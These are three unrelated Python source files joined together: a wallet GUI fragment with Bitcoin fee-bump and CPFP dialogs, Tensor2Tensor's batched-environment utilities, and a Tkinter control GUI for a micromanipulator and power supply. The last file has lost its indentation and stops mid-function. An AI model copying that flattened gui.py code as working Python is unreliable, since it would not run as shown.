    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # recompute the derived labels whenever the fee field changes
        fee_for_child = fee_e.get_amount()
        if fee_for_child is None:
            # field empty/unparsable while typing: skip instead of TypeError
            return
        out_amt = max_fee - fee_for_child
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_for_child
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee is None:
        # BUGFIX: an empty fee field used to raise TypeError on the
        # comparison below; treat it as a cancel instead.
        return
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    # new_tx.set_rbf(True)
    new_tx.set_rbf(False)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Ask the user for a new feerate and build an RBF replacement for `tx`.

    Shows a modal dialog with the current fee/feerate and a slider plus a
    manual feerate entry; on OK, asks the wallet for a bumped replacement
    transaction and shows it. Errors are reported via show_error.
    """
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    old_fee_rate = fee / tx_size  # sat/vbyte
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
    vbox.addWidget(QLabel(_('New Fee rate') + ':'))

    def on_textedit_rate():
        # Manual feerate entry takes precedence: grey out the slider.
        fee_slider.deactivate()
    # Suggest a meaningfully higher feerate: 1.5x the old one, but at least +1 sat/vbyte.
    feerate_e = FeerateEdit(lambda: 0)
    feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
    feerate_e.textEdited.connect(on_textedit_rate)
    vbox.addWidget(feerate_e)

    def on_slider_rate(dyn, pos, fee_rate):
        # Slider interaction re-activates it and mirrors its rate (per kB)
        # into the per-byte entry field.
        fee_slider.activate()
        if fee_rate is not None:
            feerate_e.setAmount(fee_rate / 1000)
    fee_slider = FeeSlider(self, self.config, on_slider_rate)
    fee_slider.deactivate()
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    # NOTE(review): is_final is collected but unused below — the RBF flag is
    # forced off regardless of the checkbox; presumably a deliberate fork
    # divergence from upstream (see commented-out lines), confirm.
    is_final = cb.isChecked()
    # NOTE(review): get_amount() may return None if the field was cleared;
    # presumably wallet.bump_fee rejects that — confirm against its contract.
    new_fee_rate = feerate_e.get_amount()
    try:
        new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    #if is_final:
    #    new_tx.set_rbf(True)
    new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add the offline transaction `tx` to the wallet history and persist it.

    Args:
        tx: the transaction to record locally (not broadcast).

    Returns:
        True if the transaction was added and storage written; False if it
        conflicts with current history or the wallet rejects it.
    """
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx.txid(), tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
                           _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        # show_error expects message text; pass the exception's message
        # rather than the exception object itself.
        win.show_error(str(e))
        return False
    else:
        self.wallet.storage.write()
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
               _("Note: this is an offline transaction, if you want the network "
                 "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
        return True
|
utils.py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for using batched environments."""
# The code was based on Danijar Hafner's code from tf.agents:
# https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py
# https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import os
import random
import signal
import subprocess
import sys
import traceback
# Dependency imports
import gym
from tensor2tensor.rl.envs import batch_env
from tensor2tensor.rl.envs import py_func_batch_env
from tensor2tensor.rl.envs import simulated_batch_env
import tensorflow as tf
class EvalVideoWrapper(gym.Wrapper):
    """Record videos on every other trajectory during the eval phase.

    Designed to pair gym.wrappers.Monitor-style recording with the t2t
    collect phase, working around Monitor's restriction that an active
    environment cannot be reset. The caller is assumed to consume only every
    second trajectory: odd-numbered resets begin an "active" run that
    forwards calls to the wrapped environment (so video is produced), while
    even-numbered resets begin an "inactive" run during which the wrapped
    environment is never touched and the last observed transition is
    replayed instead.
    """

    def __init__(self, env):
        super(EvalVideoWrapper, self).__init__(env)
        self._reset_counter = 0     # alternates active/inactive runs
        self._active = False        # True while forwarding to the real env
        self._last_returned = None  # last transition tuple from an active run

    def _step(self, action):
        # Only active runs actually advance the wrapped environment; an
        # inactive run just replays the most recent transition.
        if self._active:
            self._last_returned = self.env.step(action)
        if self._last_returned is None:
            raise Exception("Environment stepped before proper reset.")
        return self._last_returned

    def _reset(self, **kwargs):
        self._reset_counter += 1
        self._active = self._reset_counter % 2 == 1
        if self._active:
            return self.env.reset(**kwargs)
        # Inactive run: keep the last observation but clear the done flag so
        # the episode appears to continue.
        obs, reward, _, info = self._last_returned
        self._last_returned = (obs, reward, False, info)
        return obs
class ExternalProcessEnv(object):
    """Step environment in a separate process for lock free parallelism."""

    # Message types for communication via the pipe.
    _ACCESS = 1     # request: read an attribute; payload is the attribute name
    _CALL = 2       # request: call a method; payload is (name, args, kwargs)
    _RESULT = 3     # response: success; payload is the value/return value
    _EXCEPTION = 4  # response: worker failed; payload is a stacktrace string
    _CLOSE = 5      # request: shut the worker down; payload is None

    def __init__(self, constructor, xvfb):
        """Step environment in a separate process for lock free parallelism.

        The environment will be created in the external process by calling the
        specified callable. This can be an environment class, or a function
        creating the environment and potentially wrapping it. The returned
        environment should not access global variables.

        Args:
          constructor: Callable that creates and returns an OpenAI gym environment.
          xvfb: Frame buffer.

        Attributes:
          observation_space: The cached observation space of the environment.
          action_space: The cached action space of the environment.
        """
        self._conn, conn = multiprocessing.Pipe()
        if xvfb:
            # Start a private X virtual framebuffer so the env can render
            # without a real display; randomized ids avoid collisions between
            # concurrently launched workers.
            server_id = random.randint(10000, 99999)
            auth_file_id = random.randint(10000, 99999999999)
            xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id)
            command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format(
                server_id, xauthority_path)
            with open(os.devnull, "w") as devnull:
                proc = subprocess.Popen(command.split(), shell=False, stdout=devnull,
                                        stderr=devnull)
            # Ensure the Xvfb server is killed when this process exits.
            atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL))

            def constructor_using_xvfb():
                # Point the worker at the private display before building the env.
                # NOTE(review): a nested function as a Process target is only
                # picklable under the 'fork' start method — presumably
                # Linux-only; confirm before relying on spawn platforms.
                os.environ["DISPLAY"] = ":{}".format(server_id)
                os.environ["XAUTHORITY"] = xauthority_path
                return constructor()
            self._process = multiprocessing.Process(
                target=self._worker, args=(constructor_using_xvfb, conn))
        else:
            self._process = multiprocessing.Process(
                target=self._worker, args=(constructor, conn))
        atexit.register(self.close)
        self._process.start()
        # Space caches, filled lazily on first access to avoid an extra
        # round-trip at construction time.
        self._observ_space = None
        self._action_space = None

    @property
    def observation_space(self):
        # Fetched from the worker once via the pipe, then cached locally.
        if not self._observ_space:
            self._observ_space = self.__getattr__("observation_space")
        return self._observ_space

    @property
    def action_space(self):
        # Fetched from the worker once via the pipe, then cached locally.
        if not self._action_space:
            self._action_space = self.__getattr__("action_space")
        return self._action_space

    def __getattr__(self, name):
        """Request an attribute from the environment.

        Note that this involves communication with the external process, so it can
        be slow.

        Args:
          name: Attribute to access.

        Returns:
          Value of the attribute.
        """
        self._conn.send((self._ACCESS, name))
        return self._receive()

    def call(self, name, *args, **kwargs):
        """Asynchronously call a method of the external environment.

        Args:
          name: Name of the method to call.
          *args: Positional arguments to forward to the method.
          **kwargs: Keyword arguments to forward to the method.

        Returns:
          Promise object that blocks and provides the return value when called.
        """
        payload = name, args, kwargs
        self._conn.send((self._CALL, payload))
        # The bound _receive method serves as the promise: calling it blocks
        # on the pipe. NOTE(review): overlapping calls share one pipe, so
        # results are matched to callers purely by FIFO order.
        return self._receive

    def close(self):
        """Send a close message to the external process and join it."""
        try:
            self._conn.send((self._CLOSE, None))
            self._conn.close()
        except IOError:
            # The connection was already closed.
            pass
        self._process.join()

    def step(self, action, blocking=True):
        """Step the environment.

        Args:
          action: The action to apply to the environment.
          blocking: Whether to wait for the result.

        Returns:
          Transition tuple when blocking, otherwise callable that returns the
          transition tuple.
        """
        promise = self.call("step", action)
        if blocking:
            return promise()
        else:
            return promise

    def reset(self, blocking=True):
        """Reset the environment.

        Args:
          blocking: Whether to wait for the result.

        Returns:
          New observation when blocking, otherwise callable that returns the new
          observation.
        """
        promise = self.call("reset")
        if blocking:
            return promise()
        else:
            return promise

    def _receive(self):
        """Wait for a message from the worker process and return its payload.

        Raises:
          Exception: An exception was raised inside the worker process.
          KeyError: The received message is of an unknown type.

        Returns:
          Payload object of the message.
        """
        message, payload = self._conn.recv()
        # Re-raise exceptions in the main process.
        if message == self._EXCEPTION:
            stacktrace = payload
            raise Exception(stacktrace)
        if message == self._RESULT:
            return payload
        raise KeyError("Received message of unexpected type {}".format(message))

    def _worker(self, constructor, conn):
        """The process waits for actions and sends back environment results.

        Args:
          constructor: Constructor for the OpenAI Gym environment.
          conn: Connection for communication to the main process.
        """
        try:
            env = constructor()
            while True:
                try:
                    # Only block for short times to have keyboard exceptions be raised.
                    if not conn.poll(0.1):
                        continue
                    message, payload = conn.recv()
                except (EOFError, KeyboardInterrupt):
                    break
                if message == self._ACCESS:
                    name = payload
                    result = getattr(env, name)
                    conn.send((self._RESULT, result))
                    continue
                if message == self._CALL:
                    name, args, kwargs = payload
                    result = getattr(env, name)(*args, **kwargs)
                    conn.send((self._RESULT, result))
                    continue
                if message == self._CLOSE:
                    assert payload is None
                    env.close()
                    break
                raise KeyError("Received message of unknown type {}".format(message))
        except Exception:  # pylint: disable=broad-except
            # Ship the formatted traceback to the parent so _receive can re-raise.
            stacktrace = "".join(traceback.format_exception(*sys.exc_info()))  # pylint: disable=no-value-for-parameter
            tf.logging.error("Error in environment process: {}".format(stacktrace))
            conn.send((self._EXCEPTION, stacktrace))
        conn.close()
def batch_env_factory(environment_lambda, hparams, num_agents, xvfb=False):
    """Build a batch environment and apply any configured in-graph wrappers.

    Args:
      environment_lambda: callable creating a single environment instance.
      hparams: hyperparameters; `simulated_environment` selects model-based
        simulation, and optional `in_graph_wrappers` is an iterable of
        (wrapper_class, kwargs_dict) pairs applied in order.
      num_agents: number of parallel environment copies in the batch.
      xvfb: whether real (non-simulated) envs should render into Xvfb.

    Returns:
      The (possibly wrapped) batch environment.
    """
    # getattr with a default replaces the hasattr/conditional dance.
    wrappers = getattr(hparams, "in_graph_wrappers", [])
    if hparams.simulated_environment:
        cur_batch_env = define_simulated_batch_env(environment_lambda, num_agents)
    else:
        cur_batch_env = define_batch_env(environment_lambda, num_agents, xvfb=xvfb)
    for w in wrappers:
        # Each entry is (wrapper_class, kwargs) applied around the current env.
        cur_batch_env = w[0](cur_batch_env, **w[1])
    return cur_batch_env
def define_batch_env(constructor, num_agents, xvfb=False):
    """Create `num_agents` external-process envs and wrap them as one batch env."""
    with tf.variable_scope("environments"):
        workers = [ExternalProcessEnv(constructor, xvfb)
                   for _ in range(num_agents)]
        batched = batch_env.BatchEnv(workers, blocking=False)
        return py_func_batch_env.PyFuncBatchEnv(batched)
def define_simulated_batch_env(environment_lambda, num_agents):
    """Build a model-based (simulated) batch environment of `num_agents` copies."""
    return simulated_batch_env.SimulatedBatchEnv(environment_lambda, num_agents)
|
gui.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# GUI module generated by PAGE version 4.17
# In conjunction with Tcl version 8.6
# Nov 05, 2018 02:38:38 AM EST platform: Linux
import os
import sys
import time
import re
current_directory = os.getcwd()
parent_directory = os.path.dirname(current_directory)
sys.path.insert(0, parent_directory)
from api.demagnetizer import Demagnetizer # noqa: 402
try:
from Tkinter import (
Text,
Tk,
Toplevel,
Menu,
Frame,
Entry,
Label,
Button,
Listbox,
Spinbox,
Radiobutton,
Pack,
Grid,
Place)
except ImportError:
from tkinter import (
Text,
Tk,
Toplevel,
Menu,
Frame,
Entry,
Label,
Button,
Listbox,
Spinbox,
Radiobutton,
Pack,
Grid,
Place)
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import gui_support # noqa: 402
import serial.tools.list_ports # noqa: 402
from api.wave_visualizer import visualize_wave # noqa: 402
from api.manipulator import Manipulator, Mode, Resolution # noqa: 402
from api.power_supply import PowerSupply, MIN_STEP_PERIOD # noqa: 402
from api.relay import Relay # noqa: 402
from threading import Thread # noqa: 402
def vp_start_gui():
    """Launch the application standalone: build the root window, wire up the
    support module, and enter the Tk event loop."""
    global val, w, root
    root = Tk()
    gui_support.set_Tk_var()
    gui_support.init(root, GUI(root))
    root.mainloop()


# Module-level handle for the Toplevel created by create_GUI (None until then).
w = None
def create_GUI(root, *args, **kwargs):
    """Entry point when this module is imported by another program.

    Creates the GUI inside a new Toplevel child of `root` and returns the
    (window, controller) pair.
    """
    global w, w_win, rt
    rt = root
    w = Toplevel(root)
    gui_support.set_Tk_var()
    ui = GUI(w)
    gui_support.init(w, ui, *args, **kwargs)
    return w, ui
def destroy_GUI():
    """Tear down the window created by create_GUI and clear the module handle."""
    global w
    w.destroy()
    w = None
class GUI:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # noqa X11 color: 'gray85'
_ana2color = '#d9d9d9' # X11 color: 'gray85'
font10 = ("-family Verdana -size 14 -weight normal -slant roman "
"-underline 0 -overstrike 0")
font11 = ("-family Verdana -size 14 -weight bold -slant roman "
"-underline 0 -overstrike 0")
font9 = ("-family Verdana -size 12 -weight normal -slant roman "
"-underline 0 -overstrike 0")
self.style = ttk.Style()
if sys.platform == "win32":
self.style.theme_use('winnative')
self.style.configure('.', background=_bgcolor)
self.style.configure('.', foreground=_fgcolor)
self.style.configure('.', font="TkDefaultFont")
self.style.map(
'.', background=[('selected', _compcolor), ('active', _ana2color)])
top.geometry("758x629+110+66")
top.title("GUI")
top.configure(highlightcolor="black")
self.menubar = Menu(top, font="TkMenuFont", bg=_bgcolor, fg=_fgcolor)
top.configure(menu=self.menubar)
# TODO
'''
-MANUAL COM PORT SELECTION, VARIABLE COM PORTS, AUTO DETECT COM PORTS?
-STOP/INTERRUPT BUTTONS
-MAKE PATHING FUNCTION
-Be able to save and load 2 position
'''
# INSTANCE INITIALIZATION FOR MANIPULATOR, POWER SUPPLY, AND DEMAG
ports = list(serial.tools.list_ports.comports())
relay_1 = Relay(5)
relay_2 = Relay(6)
mm = None
supply = None
demagnetizer = None
for p in ports:
if "/dev/ttyUSB0" in p:
supply = PowerSupply("/dev/ttyUSB0", relay_1, relay_2)
demagnetizer = Demagnetizer(supply, relay_1, relay_2)
if "/dev/ttyUSB1" in p:
mm = Manipulator("/dev/ttyUSB1")
# BEGINNING OF FUNCTIONALITY
def demagnetization():
"""
Begins the demagnetization process. Must call
calibrate_demag() the first time the GUI is opened.
A 3 second delay is added to this function to allow the
user to get into position.
"""
try:
# global defined in calibrate_demag()
zero_field # noqa
except NameError:
self.console_output.insert(1.0, "Calibration required\n")
else:
self.console_output.insert(1.0,
"Demagnetization in progress\n")
time.sleep(3)
demagnetizer.demag_current(zero_field) # noqa
r_field = demagnetizer.get_field()
demag_complete = "Demagnetization complete. Residual field is "
self.console_output.insert(
1.0, demag_complete + str(r_field) + "\n")
def calibrate_demag():
"""
Calibration of the Hall sensor. This function should be
called before every demagnetization for optimal results.
A 3 second delay is added to this function to allow the
user to get into position.
"""
self.console_output.insert(1.0, "Calibration in progress\n")
time.sleep(3)
global zero_field
zero_field = demagnetizer.calibrate()
self.console_output.insert(1.0,
"Calibration complete. Zero field is " +
str(zero_field) + "\n")
def status_refresh():
"""
Is called by many other functions but can be manually called
as well via the Refresh button.
Polls the manipulator and the power supply for updates on
various parameters.
"""
if mm is not None:
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
gui_support.status_abspos_v.set(
str(x) + " x, " + str(y) + " y, " + str(z) + " z")
mm_status_dict = mm.get_status()
vel = mm_status_dict['XSPEED']
gui_support.velocity.set(str(vel))
gui_support.status_vel_v.set(str(vel))
res = mm_status_dict['XSPEED_RES']
gui_support.status_res_v.set(str(res))
mm.refresh_display()
c = round(supply.get_current(), 4)
gui_support.status_current_v.set(str(c))
gui_support.status_magfield_v.set(str(demagnetizer.get_field()))
self.console_output.insert(1.0, "Status page refreshed\n")
def is_ok(string):
"""
Checks to make sure the input string is valid. The string
should contain only numbers and not contain any special
characters besides only 1 of '-' and '.' each.
No alphabetical characters.
:param string: String to check for validity
"""
match = re.search('[^0-9.-]', str(string))
if match:
return True
else:
if not string:
return True
elif string.count('-') > 1 or string.count('.') > 1:
return True
elif string.find('-') != -1 and not (string.startswith('-')):
return True
elif string.startswith('.'):
return True
elif string.startswith('-') and len(string) == 1:
return True
else:
return False
def gtp():
"""
Calls the manipulator api function go_to_position with
parameters set to the entry fields.
"""
x = gui_support.gtp_x.get()
y = gui_support.gtp_y.get()
z = gui_support.gtp_z.get()
if (is_ok(x) or is_ok(y) or is_ok(z)):
format_warning = ("Only numbers, '-', and '.' are allowed. ",
"Please check format\n")
self.console_output.insert(1.0, format_warning)
else:
self.console_output.insert(
1.0, "Moving to " + x + "x " + y + "y " + z + "z\n")
mm.set_mode(Mode.ABSOLUTE)
mm.go_to_position(float(x), float(y), float(z))
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def save_pos():
"""
Saves the position currently entered into the 3 entry
fields. This does not save the current position.
"""
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
self.Listbox_pos.insert(
0,
str(x) + "x, " + str(y) + "y, " + str(z) + "z")
self.console_output.insert(1.0, "Position saved to list\n")
def go_to():
"""
Moves manipulator to selected position in the listbox.
"""
index = self.Listbox_pos.curselection()
selected = self.Listbox_pos.get(index)
if not selected:
self.console_output.insert(1.0,
"Please select a destination\n")
else:
x, y, z = selected.split(", ")
x = x[:-1]
y = y[:-1]
z = z[:-1]
self.console_output.insert(
1.0, "Moving to " + x + "x " + y + "y " + z + "z\n")
mm.set_mode(Mode.ABSOLUTE)
mm.go_to_position(float(x), float(y), float(z))
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def delete():
"""
Delete selected element from the list.
"""
index = self.Listbox_pos.curselection()
if index is None:
self.console_output.insert(1.0,
"Please select a destination\n")
else:
self.Listbox_pos.delete(index)
self.console_output.insert(1.0, "Deleted list entry\n")
def step_x():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
"""
xmove = gui_support.step_x.get()
if (is_ok(xmove)):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(xmove) + "x\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(float(xmove) + x, y, z)
self.console_output.insert(1.0, "Moving complete\n")
status_refresh()
def step_y():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
"""
ymove = gui_support.step_y.get()
if is_ok(ymove):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(ymove) + "y\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(x, float(ymove) + y, z)
self.console_output.insert(1.0, "Move complete\n")
status_refresh()
def step_z():
"""
Calls the manipulator api function get_position to get
parameters for the manipulator api function go_to_position.
:return:
"""
zmove = gui_support.step_z.get()
if (is_ok(zmove)):
coord_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, coord_warning)
else:
self.console_output.insert(1.0,
"Moving by " + str(zmove) + "z\n")
mm.set_mode(Mode.ABSOLUTE)
x, y, z = mm.get_current_position()
mm.go_to_position(x, y, float(zmove) + z)
self.console_output.insert(1.0, "Move complete\n")
status_refresh()
def change_velocity():
"""
Calls the manipulator api function change_velocity which
changes velocity and resolution of user input.
"""
vel = gui_support.velocity.get()
if is_ok(vel):
vel_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, vel_warning)
elif float(vel) <= 0:
vel_warning = "Velocity must be positive and less than 1000\n"
self.console_output.insert(1.0, vel_warning)
else:
if gui_support.radio_resolution.get() == "low":
mm.set_velocity(float(vel), Resolution.LOW)
else:
mm.set_velocity(float(vel), Resolution.HIGH)
self.console_output.insert(
1.0, "Changed velocity to " + str(vel) + "um/s\n")
status_refresh()
def change_resolution():
"""
Calls the manipulator api function change_velocity which
changes velocity and resolution of user input
but the velocity is kept the same as what is programmed to
the device.
"""
mm_status_dict = mm.get_status()
vel = mm_status_dict['XSPEED']
if gui_support.radio_resolution.get() == "low":
mm.set_velocity(float(vel), Resolution.LOW)
else:
mm.set_velocity(float(vel), Resolution.HIGH)
status_refresh()
def path():
"""
Pathing function takes a parametric each equation for x y
and z direction. Last two field are for the upper and
lower bound.
"""
def master_stop():
"""
Calls both the manipulator and supply interrupts and set
duration to 0 which kills the timer thread.
This function should also stop the demagnetization process.
Implementation would require separate thread for demagnetization.
"""
supply_interupt()
mm_interupt()
gui_support.status_duration_v.set("0")
self.console_output.insert(1.0, "All processes stopped\n")
def mm_interupt():
"""
Calls the manipulator api function interrupt()
"""
mm.interrupt()
self.console_output.insert(1.0, "Micromanipulator interrupted\n")
def supply_interupt():
"""
Calls the power_supply api functions disable_output and
stop_wave. Kills timer thread.
"""
supply.disable_output()
supply.stop_wave()
gui_support.status_duration_v.set("0")
self.console_output.insert(1.0, "Power supply interrupted\n")
def stop():
"""
Calls the power_supply api functions disable_output and
stop_wave. Kills timer thread.
"""
supply.disable_output()
gui_support.status_duration_v.set("0")
supply.stop_wave()
self.console_output.insert(1.0, "Power supply output disabled\n")
def constant_run():
"""
Program the power supply to a constant current and starts
a timer thread for the duration.
"""
duration = gui_support.constant_duration.get()
current = gui_support.constant_amps.get()
if (is_ok(duration) or is_ok(current)):
dur_cur_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, dur_cur_warning)
elif float(duration) <= 0:
dur_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, dur_warning)
elif float(current) > 3:
cur_warning = "Current must be less than 3\n"
self.console_output.insert(1.0, cur_warning)
else:
supply.set_current(float(current))
supply.enable_output()
gui_support.status_wave_v.set("Constant")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running constant wave for " + str(duration) + "s\n")
def square_run():
"""
Program the power supply to a square wave and starts a
timer thread for the duration.
"""
curr = gui_support.square_amp.get()
freq = gui_support.square_freq.get()
duty = gui_support.square_duty.get()
duration = gui_support.square_duration.get()
if (is_ok(duration) or is_ok(curr) or is_ok(freq) or is_ok(duty)):
square_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, square_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(curr) > 3:
current_warning = "Current must be less than or equal to 3\n"
self.console_output.insert(1.0, current_warning)
else:
supply.start_square_wave(
float(curr), 1 / float(freq),
float(duty) / 100)
gui_support.status_wave_v.set("Square")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running square wave for " + str(duration) + "s\n")
def sinusoidal_run():
"""
Program the power supply to a sin wave and starts a timer
thread for the duration.
"""
amp = gui_support.sin_amplitude.get()
offset = gui_support.sin_offset.get()
freq = gui_support.sin_freq.get()
duration = gui_support.sin_duration.get()
if (is_ok(duration) or is_ok(amp) or is_ok(freq) or is_ok(offset)):
sine_warning = ("Only numbers, '-', and '.' are allowed. "
"Please check format\n")
self.console_output.insert(1.0, sine_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(amp) + float(offset) > 3:
amp_offset_warning = ("Amplitude + offset must be less than "
"or equal to 3\n")
self.console_output.insert(1.0, amp_offset_warning)
else:
supply.start_sine_wave(
float(amp), 1 / float(freq), None, float(offset))
gui_support.status_wave_v.set("Sinusoidal")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0,
"Running sinusoidal wave for " + str(duration) + "s\n")
def ramping_run():
"""
Program the power supply to a ramping wave and starts a
timer thread for the duration.
"""
amp = gui_support.ramping_amp.get()
rise = gui_support.ramping_rise.get()
steady = gui_support.ramping_steady.get()
rest = gui_support.ramping_rest.get()
duration = gui_support.ramping_duration.get()
if (is_ok(duration) or is_ok(amp) or is_ok(rise) or is_ok(steady)
or is_ok(rest)): # noqa
console_warning = ("Only numbers, '-', and '.' are allowed."
" Please check format\n")
self.console_output.insert(1.0, console_warning)
elif float(duration) <= 0:
duration_warning = "Duration must be greater than 0\n"
self.console_output.insert(1.0, duration_warning)
elif float(amp) > 3:
amp_warning = "Current must be less than or equal to 3\n"
self.console_output.insert(1.0, amp_warning)
else:
supply.start_ramp_wave(
float(amp), float(rise), float(steady), float(rest))
gui_support.status_wave_v.set("Ramping")
gui_support.status_duration_v.set(str(duration))
duration_thread = Thread(target=duration_timer)
duration_thread.start()
self.console_output.insert(
1.0, "Running ramping wave for " + str(duration) + "s\n")
def duration_timer():
"""
Duration thread used to time power supply functionality.
"""
duration = float(gui_support.status_duration_v.get())
while duration > 0:
if (float(gui_support.status_duration_v.get()) <= 0):
supply.disable_output()
supply.stop_wave()
break
self.console_output.delete(1.0)
self.console_output.insert(
1.0, "Remaining duration: " + str(duration) + "\n")
time.sleep(1)
duration = duration - 1
supply.stop_wave()
supply.disable_output()
def clear_console():
"""
Clears Console Output.
"""
self.console_output.delete(1.0, END) # noqa
def write_log():
"""
Writes the contents of the Console Output to a file.
"""
current_directory = os.getcwd() + "/log.txt"
msg = self.console_output.get(1.0, END) # noqa
f = open(current_directory, 'a+')
f.write("==========================NEW LOG"
"==========================\n" + msg)
f.close()
def plot_square():
amp = gui_support.square_amp.get()
freq = gui_support.square_freq.get()
period = 1 / float(freq)
duty = gui_support.square_duty.get()
duty_cycle = float(duty) / 100
square_function = '%f * (step(t) - step(t-%f))' % (
float(amp), period * duty_cycle)
visualize_wave(
square_function, 't', (0, period), wave_title="Square Wave")
def plot_ramping():
